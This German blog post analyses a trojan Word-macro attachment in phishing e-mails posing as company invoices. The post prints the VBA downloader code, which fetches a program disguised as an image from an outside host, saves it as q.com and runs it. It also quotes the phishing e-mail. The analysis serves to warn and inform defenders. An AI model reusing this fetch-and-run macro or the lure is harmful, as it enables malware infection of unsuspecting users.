Trojaner: MS Word Anhänge

[vgwort line=“59″ server=“vg05″ openid=“7ec146beb885402bb644041036637d36″]

[tawarning] Die MS-Word Dokumente scheinen sich einer neuen Beliebtheit als Viren und Trojanerschleuder zu erfreuen. Heute fand ich zwei E-Mails mit einer anderen Variante im Postfach. Der Text der E-Mails ist minimal:

Die E-Mail

Date: Tue, 24 Jun 2014 06:56:11 +0100
From: „Viktoria Thies“ <warenrechung@kuechen-vogt.de>
To: „thomas@example.com“ <thomas@example.com>
Subject: inhumanly
Guten Tag,


Viktoria Thies
inhumanly.doc

Die E-Mail-Adresse stimmt mit dem in der Mail genannten Absender überein. Offensichtlich soll der Anschein erweckt werden, dass diese Mail eine Rechnung der Firma Küchen Vogt ist. Der Betreff entspricht dem Dateinamen des Anhanges ohne Erweiterung; dies passt meines Erachtens nicht zu einer Rechnung. Kunden der Firma könnten allerdings auf diesen Schwindel herein fallen. In Zusammenhang mit Küchen Vogt habe ich allerdings keine Viktoria Thies gefunden, aber wer kennt schon die Namen der Damen im Hintergrund oder der Verkäufer. Kaum eine Firma leistet es sich heute noch Mails ohne Disclaimer und Impressum zu schicken.

und ihr Anhang

Der Anhang ist ein MS-Word Dokument mit Makro-Code. Im Zeichen der Codesicherheit sollte dieses Prinzip wenig Erfolg versprechend sein, dass es dennoch genutzt wird, zeigt dass das Gegenteil wohl der Fall ist.

Das Grundprinzip des Trojaner entspricht dem bereits bekannten Trojaner, der Code ist jedoch anders. Der Programmierer hat darauf verzichtet, die Variablennamen zu obfuskieren (verschleiern).

Kern sind die Subroutinen h und m. Die Subroutine Base64_Encode wird nicht verwendet, daher habe ich sie hier weg gelassen. Auch das schmückende Beiwerk zum Autostart habe ich entfernt.

Subroutine h

Sub h()
 
Set oShell = CreateObject("WScript.Shell")
strH = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
Dim sDir: sDir = strH & "\q"
 
 
Set fso = CreateObject("Scripting.FileSystemObject")
  If (fso.FolderExists(sDir)) Then
 
 
  Else
  Set oFSO = CreateObject("Scripting.FileSystemObject")
      oFSO.CreateFolder sDir
 
 
End If
 
Dim xHttp: Set xHttp = CreateObject("MSXML2.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://example.com/images/img-0001.jpg", False
xHttp.Send
 
With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile strH & "\q\q.com", 2
End With
 
 
Call m(sDir)
 
End Sub

Die Subroutine h erstellt ein Verzeichnis %USERPROFILES%\q und speichert darin ein als Bild getarntes Programm, das aus dem Internet herunter geladen wird, unter dem Namen %USERPROFILES%\q\q.com ab. Anschließend wird die Subroutine m aufgerufen.

Subroutine m

Function m(str11)
    Dim fso, f, fc, f1, strF, intFiles
    Dim WshShell
 
    Set WshShell = CreateObject("WScript.Shell")
 
    strF = ""
 
    Set fso = CreateObject("Scripting.FileSystemObject")
    If (fso.FolderExists(str11)) Then
        Set f = fso.GetFolder(str11)
        Set fc = f.Files
 
 
        For Each f1 In fc
        Dim fR
        fR = str11 & "\" & f1.Name
        WshShell.Run Chr(34) & fR & Chr(34), 1, True
    Next
 
        Set f1 = Nothing
        Set fc = Nothing
        Set f = Nothing
 
 
    End If
    Set fso = Nothing
End Function

Die Subroutine h startet alle Dateien, die in dem Verzeichnis %USERPROFILES%\q liegen, unabhängig davon, ob es sich um ein Programm handelt oder nicht. Eigentlich ein überflüssiges Verhalten. Falls der Ordner noch nicht existierte, sollte hier allerdings nur der Trojaner liegen. Warum das Makro auf das Ende des gestarteten Programmes wartet, ist mir schleierhaft. Notwendig wäre es meines Erachtens nicht.

Der Code des Subroutine m ist zwar sauber formatiert, aber nicht ganz optimal. Die Variable strF wird nicht benötigt; vielleicht hatte sie in einer früheren Version der Routine einen Zweck.

Wer weiß, wo der Programmierer den Code geklaut hat.

weitere Mails

Eine weiteren Mail war von Hans-Christof Schuch <warenrechung@infoloft.de>. Hier heißt der Anhang packets.coc. Auch infoloft.de ist eine existierende Domain, die jedoch zur Zeit nur eine leere Seite ausliefert. Andere Dokument sind auf den Server allerdings erreichbar.

Fazit

Wer auf seiner Festplatte unter seinen Dateien ein Verzeichnis \q mit einem Programm q.com findet, dürfte ein keines Problem haben.

Ein Kommentar

Kommentare sind geschlossen.